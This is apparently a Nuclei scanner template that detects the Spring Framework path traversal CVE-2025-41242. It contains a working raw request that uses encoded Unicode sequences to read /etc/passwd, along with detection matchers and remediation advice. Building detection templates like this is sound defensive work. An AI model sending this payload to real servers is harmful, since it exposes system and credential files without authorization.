Spring Framework - Path Traversal

id: CVE-2025-41242

info:
  name: Spring Framework - Path Traversal
  author: DhiyaneshDk
  severity: medium
  description: |
    Spring Framework MVC applications deployed as WAR or with embedded Servlet containers that do not reject suspicious URI sequences and serve static resources with Spring resource handling contain a path traversal vulnerability, letting attackers access unauthorized files, exploit requires non-compliant Servlet container configuration.
  reference:
    - https://x.com/phithon_xg/status/2048853566564221372
    - https://github.com/vulhub/vulhub/tree/master/spring/CVE-2025-41242
    - https://i.blackhat.com/Asia-26/Presentations/Asia-26-Bai-Cast-Attack-Ghost-Bits-4.23.pdf
    - https://nvd.nist.gov/vuln/detail/CVE-2025-41242
  impact: |
    Attackers can access unauthorized files via path traversal, potentially exposing sensitive data or system files.
  remediation: |
    Upgrade to the latest Spring Framework version and ensure deployment on compliant Servlet containers with default security features enabled.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 5.9
    cve-id: CVE-2025-41242
    epss-score: 0.05222
    epss-percentile: 0.90055
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2025,spring,jetty,lfi,uri

http:
  - raw:
      - |+
        GET /阮严灵丰丰甲来/阮严灵丰丰甲来/阮严灵丰丰甲来/阮严灵丰丰甲来/阮严灵丰丰甲来/阮严灵丰丰甲来/阮严灵丰丰甲来/etc/passw%64 HTTP/1.1
        Host: {{Hostname}}
        Connection: close

    unsafe: true

    matchers:
      - type: dsl
        dsl:
          - regex('root:.*:0:0:', body)
          - contains(header, "application/octet-stream")
          - status_code == 200
        condition: and
# digest: 4b0a00483046022100ad3c2b215606ef9fd08711857f813b7395918b897cb00bcf0c2d23a5c8827d4b022100fa21935e36fdcfd40c8c478c56e440e54a40365bfb9fb503d67b4823942b2347:922c64590222798bb761d5b6d8e72950